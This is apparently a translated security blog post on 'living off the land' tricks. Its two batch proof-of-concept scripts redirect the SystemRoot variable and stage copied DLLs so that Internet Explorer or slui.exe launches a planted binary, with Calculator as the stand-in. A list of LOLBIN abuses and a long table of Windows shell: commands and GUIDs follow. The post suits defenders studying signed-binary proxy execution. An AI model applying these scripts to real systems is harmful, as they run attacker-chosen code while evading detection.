Video walkthrough
In this video we share a few surprising LOLBIN tricks. First, a quick introduction to the concept of a LOLBIN (Living off the Land Binary): it is a common way for attackers to hide their tracks by abusing files that ship with the operating system, or other files signed by the system itself, in order to slip past detection. Here we use the Windows built-in `start iexplore` command, which launches Internet Explorer, to force a user to run software of the attacker's choosing; Calculator serves as the proof of concept. Let's take a look!
LOLBIN trick explained
Shared on Twitter by @notwhickey
![Image [1] - How to force malware to run through the IE browser - 铭心博客](https://oss.imxbk.com/wp-content/uploads/2023/02/20250511194251433.webp?x-oss-process=image/format,webp/watermark,text_d3d3LmlteGJrLmNvbQ,type_ZmFuZ3poZW5naGVpdGk,size_13,g_se,x_10,y_10)
Have you ever considered that Internet Explorer is a LOLBIN?
By navigating to the URI shell:::{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107} you can spawn rstrui.exe (System Restore).
If you modify the SystemRoot environment variable and copy the DLLs, you can run anything you like.
![Image [2] - How to force malware to run through the IE browser - 铭心博客](https://oss.imxbk.com/wp-content/uploads/2023/02/20250511194253998.webp?x-oss-process=image/format,webp/watermark,text_d3d3LmlteGJrLmNvbQ,type_ZmFuZ3poZW5naGVpdGk,size_13,g_se,x_10,y_10)
Verification PoC

```bat
REM Typed at an interactive cmd prompt (a .bat file would need %%F in the FOR loop)
REM Stage a private System32 under %temp% and copy in the DLLs rstrui.exe needs
mkdir %temp%\System32
FOR /R C:\Windows\System32\ %F IN (*.dll) DO COPY "%F" %temp%\System32\ /Y >NUL
REM Calculator is the proof-of-concept program, staged under the name rstrui.exe
set a=C:\Windows\System32\calc.exe
copy %a% %temp%\System32\rstrui.exe /Y > NUL
REM Point SystemRoot at the staged directory for this cmd session and its children
set SystemRoot=%temp%
REM IE resolves the System Restore shell GUID to %SystemRoot%\System32\rstrui.exe
start iexplore shell:::{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107}
```
![Image [3] - How to force malware to run through the IE browser - 铭心博客](https://oss.imxbk.com/wp-content/uploads/2023/02/20250511194257464.webp?x-oss-process=image/format,webp/watermark,text_d3d3LmlteGJrLmNvbQ,type_ZmFuZ3poZW5naGVpdGk,size_13,g_se,x_10,y_10)
I found a signed #lolbin for proxy execution.
Use set to change the SystemRoot environment variable to a controlled directory.
Plant a binary at <controlled directory>\System32\ChangePk.exe.
Copy the necessary DLLs.
Run slui.exe.
I wonder whether it works on your CPU.
![Image [4] - How to force malware to run through the IE browser - 铭心博客](https://oss.imxbk.com/wp-content/uploads/2023/02/20250511194259330.webp?x-oss-process=image/format,webp/watermark,text_d3d3LmlteGJrLmNvbQ,type_ZmFuZ3poZW5naGVpdGk,size_13,g_se,x_10,y_10)
Verification PoC

```bat
REM Typed at an interactive cmd prompt (a .bat file would need %%F in the FOR loop)
set a=C:\Windows\System32\calc.exe
REM Point SystemRoot at a controlled directory and stage a System32 beneath it
set SystemRoot=%temp%
mkdir %temp%\System32
copy C:\Windows\System32\slui.exe %temp%\System32\ /Y >NUL
REM Calculator is the proof-of-concept program, staged under the name ChangePk.exe
copy %a% %temp%\System32\ChangePk.exe /Y > NUL
REM Copy in the DLLs slui.exe needs from the real System32
FOR /R C:\Windows\System32\ %F IN (*.dll) DO COPY "%F" %temp%\System32\ /Y >NUL
REM slui.exe resolves ChangePk.exe relative to %SystemRoot%\System32
slui.exe
```
Introduction to LOLBINs
The following is excerpted from 《浅谈Living Off the Land Binaries》 (A Brief Discussion of Living Off the Land Binaries).
What are LoLBins
Living off the Land Binaries is abbreviated LoLBins. The term "Living off the land" was coined by Christopher Campbell and Matt Graeber. A LoLBin is a binary that an attacker can use to perform work beyond the binary's own intended function.
LoLBin capabilities
- Execute code
  - Arbitrary code execution.
  - Executing other programs (without a Microsoft signature) or scripts through LOLBins.
- Compile code
- File operations
  - Download;
  - Upload;
  - Copy.
- Persistence / maintaining access
  - Use existing LOLBins to maintain access.
  - Persistence (for example by hiding data in AD and launching at logon).
- UAC bypass
- Dumping process memory
- Surveillance (for example keyloggers, network tracing, etc.).
- Evading / modifying logs
- DLL injection / side-loading that does not require relocating to another location on the file system.
Are threat groups using LOLBINs?
Shell commands – full list
Below is a compiled list of common shell commands on Windows 11 and the application or folder each one opens.
| Shell command | Opens |
|---|---|
| shell:3D Objects | 3D Objects |
| shell:AccountPictures | Account Pictures |
| shell:AddNewProgramsFolder | AddNewProgramsFolder |
| shell:Administrative Tools | Windows Tools |
| shell:AppData | AppData |
| shell:AppDataDesktop | AppDataDesktop |
| shell:AppDataDocuments | AppDataDocuments |
| shell:AppDataFavorites | AppDataFavorites |
| shell:AppDataProgramData | AppDataProgramData |
| shell:Application Shortcuts | Application Shortcuts |
| shell:AppMods | Application Mods |
| shell:AppsFolder | AppsFolder |
| shell:AppUpdatesFolder | AppUpdatesFolder |
| shell:Cache | Cache |
| shell:Camera Roll | Camera Roll |
| shell:CameraRollLibrary | Camera Roll |
| shell:Captures | Captures |
| shell:CD Burning | Temporary Burn Folder |
| shell:ChangeRemoveProgramsFolder | ChangeRemoveProgramsFolder |
| shell:Common Administrative Tools | Windows Tools |
| shell:Common AppData | Common AppData |
| shell:Common Desktop | Public Desktop |
| shell:Common Documents | Public Documents |
| shell:Common Programs | Programs |
| shell:Common Start Menu | Start Menu |
| shell:Common Start Menu Places | Start Menu |
| shell:Common Startup | Startup |
| shell:Common Templates | Common Templates |
| shell:CommonDownloads | Public Downloads |
| shell:CommonMusic | Public Music |
| shell:CommonPictures | Public Pictures |
| shell:CommonRingtones | CommonRingtones |
| shell:CommonVideo | Public Videos |
| shell:ConflictFolder | ConflictFolder |
| shell:ConnectionsFolder | ConnectionsFolder |
| shell:Contacts | Contacts |
| shell:ControlPanelFolder | ControlPanelFolder |
| shell:Cookies | Cookies |
| shell:CredentialManager | CredentialManager |
| shell:CryptoKeys | CryptoKeys |
| shell:CSCFolder | CSCFolder |
| shell:Desktop | Desktop |
| shell:Development Files | Development Files |
| shell:Device Metadata Store | Device Metadata Store |
| shell:DocumentsLibrary | Documents |
| shell:Downloads | Downloads |
| shell:DpapiKeys | DpapiKeys |
| shell:Favorites | Favorites |
| shell:Fonts | Fonts |
| shell:GameTasks | GameTasks |
| shell:History | History |
| shell:ImplicitAppShortcuts | ImplicitAppShortcuts |
| shell:InternetFolder | InternetFolder |
| shell:Libraries | Libraries |
| shell:Links | Links |
| shell:Local AppData | Local AppData |
| shell:Local Documents | Documents |
| shell:Local Downloads | Downloads |
| shell:Local Music | Music |
| shell:Local Pictures | Pictures |
| shell:Local Videos | Videos |
| shell:LocalAppDataLow | LocalAppDataLow |
| shell:LocalizedResourcesDir | LocalizedResourcesDir |
| shell:MAPIFolder | MAPIFolder |
| shell:MusicLibrary | Music |
| shell:My Music | Music |
| shell:My Pictures | Pictures |
| shell:My Video | Videos |
| shell:MyComputerFolder | MyComputerFolder |
| shell:NetHood | NetHood |
| shell:NetworkPlacesFolder | NetworkPlacesFolder |
| shell:OEM Links | OEM Links |
| shell:OneDrive | OneDrive |
| shell:OneDriveCameraRoll | OneDriveCameraRoll |
| shell:OneDriveDocuments | OneDriveDocuments |
| shell:OneDriveMusic | OneDriveMusic |
| shell:OneDrivePictures | OneDrivePictures |
| shell:Original Images | Original Images |
| shell:Personal | Documents |
| shell:PhotoAlbums | Slide Shows |
| shell:PicturesLibrary | Pictures |
| shell:Playlists | Playlists |
| shell:PrintersFolder | PrintersFolder |
| shell:PrintHood | PrintHood |
| shell:Profile | Profile |
| shell:ProgramFiles | Program Files |
| shell:ProgramFilesCommon | ProgramFilesCommon |
| shell:ProgramFilesCommonX64 | ProgramFilesCommonX64 |
| shell:ProgramFilesCommonX86 | ProgramFilesCommonX86 |
| shell:ProgramFilesX64 | ProgramFilesX64 |
| shell:ProgramFilesX86 | Program Files (x86) |
| shell:Programs | Programs |
| shell:Public | Public |
| shell:PublicAccountPictures | Public Account Pictures |
| shell:PublicGameTasks | PublicGameTasks |
| shell:PublicLibraries | PublicLibraries |
| shell:Quick Launch | Quick Launch |
| shell:Recent | Recent Items |
| shell:Recorded Calls | Recorded Calls |
| shell:RecordedTVLibrary | Recorded TV |
| shell:RecycleBinFolder | RecycleBinFolder |
| shell:ResourceDir | ResourceDir |
| shell:Retail Demo | Retail Demo |
| shell:Ringtones | Ringtones |
| shell:Roamed Tile Images | Roamed Tile Images |
| shell:Roaming Tiles | Roaming Tiles |
| shell:SavedGames | Saved Games |
| shell:SavedPictures | Saved Pictures |
| shell:SavedPicturesLibrary | Saved Pictures |
| shell:Screenshots | Screenshots |
| shell:Searches | Searches |
| shell:SearchHistoryFolder | SearchHistoryFolder |
| shell:SearchHomeFolder | SearchHomeFolder |
| shell:SearchTemplatesFolder | SearchTemplatesFolder |
| shell:SendTo | SendTo |
| shell:Start Menu | Start Menu |
| shell:Startup | Startup |
| shell:SyncCenterFolder | SyncCenterFolder |
| shell:SyncResultsFolder | SyncResultsFolder |
| shell:SyncSetupFolder | SyncSetupFolder |
| shell:System | System |
| shell:SystemCertificates | SystemCertificates |
| shell:SystemX86 | SystemX86 |
| shell:Templates | Templates |
| shell:ThisDeviceFolder | ThisDeviceFolder |
| shell:ThisPCDesktopFolder | Desktop |
| shell:User Pinned | User Pinned |
| shell:UserProfiles | Users |
| shell:UserProgramFiles | UserProgramFiles |
| shell:UserProgramFilesCommon | UserProgramFilesCommon |
| shell:UsersFilesFolder | UsersFilesFolder |
| shell:UsersLibrariesFolder | UsersLibrariesFolder |
| shell:VideosLibrary | Videos |
| shell:Windows | Windows |
The list above is not the main point; the interesting part is here. There are also some rather odd ways of opening things through GUIDs:
| Shell command with GUID | Opens |
|---|---|
| shell:::{088e3905-0323-4b02-9826-5d99428e115f} | Downloads |
| shell:::{0DB7E03F-FC29-4DC6-9020-FF41B59E513A} | 3D Objects |
| shell:::{1CF1260C-4DD0-4ebb-811F-33C572699FDE} | Music |
| shell:::{24ad3ad4-a569-4530-98e1-ab02f9417aa8} | Pictures |
| shell:::{2559a1f8-21d7-11d4-bdaf-00c04f60b9f0} | Windows Search |
| shell:::{3134ef9c-6b18-4996-ad04-ed5912e00eb5} | Recent Files |
| shell:::{374DE290-123F-4565-9164-39C4925E467B} | Downloads |
| shell:::{38A98528-6CBF-4CA9-8DC0-B1E1D10F7B1B} | Connect To |
| shell:::{3ADD1653-EB32-4cb0-BBD7-DFA0ABB5ACCA} | Pictures |
| shell:::{3dfdf296-dbec-4fb4-81d1-6a3438bcf4de} | Music |
| shell:::{450D8FBA-AD25-11D0-98A8-0800361B1103} | My Documents |
| shell:::{679f85cb-0220-4080-b29b-5540cc05aab6} | Quick Access |
| shell:::{A0953C92-50DC-43bf-BE83-3742FED03C9C} | Videos |
| shell:::{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0} | Documents |
| shell:::{B4BFCC3A-DB2C-424C-B029-7FE99A87C641} | Desktop |
| shell:::{d3162b92-9365-467a-956b-92703aca08af} | Documents |
| shell:::{f86fa3ab-70d2-4fc7-9c99-fcbf05467f3a} | Videos |
| shell:::{D4480A50-BA28-11d1-8E75-00C04FA31A86} | Add Network Place |
| shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D} | All Control Panel Items |
| shell:::{ED7BA470-8E54-465E-825C-99712043E01C} | All Tasks |
| shell:::{4234d49b-0245-4df3-b780-3893943456e1} | Applications |
| shell:::{c57a6066-66a3-4d91-9eb9-41532179f0a5} | AppSuggestedLocations |
| shell:::{9C60DE1E-E5FC-40f4-A487-460851A8D915} | AutoPlay |
| shell:::{28803F59-3A75-4058-995F-4EE5503B023C} | Bluetooth Devices |
| shell:::{9343812e-1c37-4a49-a12e-4b2d810d956b} | Classic Windows Search |
| shell:::{437ff9c0-a07f-4fa0-af80-84b6c6440a16} | Command Folder |
| shell:::{d34a6ca6-62c2-4c34-8a7c-14709c1ad938} | Common Places FS Folder |
| shell:::{F02C1A0D-BE21-4350-88B0-7367FC96EF3C} | Network Computers and Devices |
| shell:::{26EE0668-A00A-44D7-9371-BEB064C98683} | Control Panel |
| shell:::{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0} | Control Panel command object for Start menu and desktop |
| shell:::{1206F5F1-0569-412C-8FEC-3204630DFB70} | Credential Manager |
| shell:::{b155bdf8-02f0-451e-9a26-ae317cfd7779} | delegate folder that appears in Computer |
| shell:::{A8A91A66-3A7D-4424-8D24-04E180695C7A} | Devices and Printers |
| shell:::{289AF617-1CC3-42A6-926C-E6A863F0E3BA} | Media Servers |
| shell:::{D555645E-D4F8-4c29-A827-D93C859C4F2A} | Ease of Access Center |
| shell:::{ECDB0924-4208-451E-8EE0-373C0956DE16} | Work Folders |
| shell:::{323CA680-C24D-4099-B94D-446DD2D7249E} | Favorites |
| shell:::{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF} | File Explorer Options |
| shell:::{93412589-74D4-4E4E-AD0E-E0CB621440FD} | Font settings |
| shell:::{3936E9E4-D92C-4EEE-A85A-BC16D5EA0819} | Frequent folders |
| shell:::{1D2680C9-0E2A-469d-B787-065558BC7D43} | Fusion Cache |
| shell:::{F6B6E965-E9B2-444B-9286-10C9152EDBC5} | File History |
| shell:::{67CA7650-96E6-4FDD-BB43-A8E774F73A57} | HomeGroup |
| shell:::{0907616E-F5E6-48D8-9D61-A91C3D28106D} | Remote File Browser |
| shell:::{15eae92e-f17a-4431-9f28-805e482dafd4} | Get Programs |
| shell:::{d450a8a1-9568-45c7-9c0e-b4f9fb4537bd} | Installed Updates |
| shell:::{B2B4A4D1-2754-4140-A2EB-9A76D9D7CDC6} | Linux |
| shell:::{1FA9085F-25A2-489B-85D4-86326EEDCD87} | Manage Wireless Networks |
| shell:::{63da6ec0-2e98-11cf-8d82-444553540000} | Microsoft FTP Folder |
| shell:::{89D83576-6BD1-4c86-9454-BEB04E94C819} | Microsoft Office Outlook |
| shell:::{5ea4f148-308c-46d7-98a9-49041b1dd468} | Windows Mobility Center |
| shell:::{208D2C60-3AEA-1069-A2D7-08002B30309D} | Network |
| shell:::{8E908FC9-BECC-40f6-915B-F4CA0E70D03D} | Network and Sharing Center |
| shell:::{7007ACC7-3202-11D1-AAD2-00805FC1270E} | Network Connections |
| shell:::{992CFFA0-F557-101A-88EC-00DD010CCC48} | Network Connections |
| shell:::{BD7A2E7B-21CB-41b2-A086-B309680C6B7E} | Offline Files |
| shell:::{AFDB1F70-2A4C-11d2-9039-00C04F8EEB3E} | Offline Files Folder |
| shell:::{018D5C66-4533-4307-9B53-224DE2ED1FE6} | OneDrive |
| shell:::{6785BFAC-9D2D-4be5-B7E2-59937E8FB80A} | Homegroup |
| shell:::{ED834ED6-4B5A-4bfe-8F11-A626DCB6A921} | Personalization |
| shell:::{35786D3C-B075-49b9-88DD-029876E11C01} | Portable Devices |
| shell:::{025A5937-A6BE-4686-A844-36FE4BEC8B6D} | Power Options |
| shell:::{9DB7A13C-F208-4981-8353-73CC61AE2783} | Previous Versions |
| shell:::{a3c3d402-e56c-4033-95f7-4885e80b0111} | Previous Versions Results Delegate Folder |
| shell:::{f8c2ab3b-17bc-41da-9758-339d7dbf2d88} | Previous Versions Results Folder |
| shell:::{2227A280-3AEA-1069-A2DE-08002B30309D} | Printers |
| shell:::{ed50fc29-b964-48a9-afb3-15ebb9b97f36} | printhood delegate folder |
| shell:::{7b81be6a-ce2b-4676-a29e-eb907a5126c5} | Programs and Features |
| shell:::{4336a54d-038b-4685-ab02-99bb52d3fb8b} | Public Folder |
| shell:::{4564b25e-30cd-4787-82ba-39e73a750b14} | Recent Items Instance Folder |
| shell:::{22877a6d-37a1-461a-91b0-dbda5aaebc99} | Recent Places Folder |
| shell:::{645FF040-5081-101B-9F08-00AA002F954E} | Recycle Bin |
| shell:::{863aa9fd-42df-457b-8e4d-0de1b8015c60} | Remote Printers |
| shell:::{F5FB2C77-0E2F-4A16-A381-3E560C68BC83} | Removable Drives |
| shell:::{a6482830-08eb-41e2-84c1-73920c2badb9} | Removable Storage Devices |
| shell:::{2965e715-eb66-4719-b53f-1672673bbefa} | Results Folder |
| shell:::{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0} | Run… |
| shell:::{D9EF8727-CAC2-4e60-809E-86F80A666C91} | BitLocker Drive Encryption |
| shell:::{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6} | Security and Maintenance |
| shell:::{2559a1f7-21d7-11d4-bdaf-00c04f60b9f0} | Set Program Access and Computer Defaults |
| shell:::{17cd9488-1228-4b2f-88ce-4298e93e0966} | Default Programs |
| shell:::{3080F90D-D7AD-11D9-BD98-0000947B0257} | Show desktop |
| shell:::{58E3C745-D971-4081-9034-86E34B30836A} | Speech Recognition |
| shell:::{48e7caab-b918-4e58-a94d-505519c795dc} | Start Menu |
| shell:::{F942C606-0914-47AB-BE56-1321B8035096} | Storage Spaces |
| shell:::{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF} | Sync Center |
| shell:::{2E9E59C0-B437-4981-A647-9C34B9B90891} | Sync Setup Folder |
| shell:::{BB06C0E4-D293-4f75-8A90-CB05B6477EEE} | About System |
| shell:::{9FE63AFD-59CF-4419-9775-ABCC3849F861} | System Recovery |
| shell:::{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107} | System Restore |
| shell:::{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9} | Taskbar |
| shell:::{0DF44EAA-FF21-4412-828E-260A8728E7F1} | Taskbar |
| shell:::{5b934b42-522b-4c34-bbfe-37a3ef7b9c90} | This Device |
| shell:::{f8278c54-a712-415b-b593-b77a2be0dda9} | This Device |
| shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D} | This PC |
| shell:::{C58C4893-3BE0-4B45-ABB5-A63E4B8C8651} | Troubleshooting |
| shell:::{60632754-c523-4b62-b45c-4172da012619} | User Accounts |
| shell:::{7A9D77BD-5403-11d2-8785-2E0420524153} | User Accounts |
| shell:::{1f3427c8-5c10-4210-aa03-2ee45287d668} | User Pinned |
| shell:::{59031a47-3f72-44a7-89c5-5595fe6b30ee} | UsersFiles |
| shell:::{031E4825-7B94-4dc3-B131-E946B44C8DD5} | Libraries |
| shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257} | Switch between windows |
| shell:::{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD} | Backup and Restore (Windows 7) |
| shell:::{4026492F-2F69-46B8-B9BF-5654FC07E423} | Windows Defender Firewall |
| shell:::{67718415-c450-4f3c-bf8a-b487642dc39b} | Windows Features |
| shell:::{2559a1f2-21d7-11d4-bdaf-00c04f60b9f0} | Windows Security |
| shell:::{D20EA4E1-3957-11d2-A40B-0C5020524153} | Windows Tools |
| shell:::{241D7C96-F8BF-4F85-B01F-E2B043341A4B} | RemoteApp and Desktop Connections |
| shell:::{F874310E-B6B7-47DC-BC84-B9E6B38F5903} | The Home folder in File Explorer |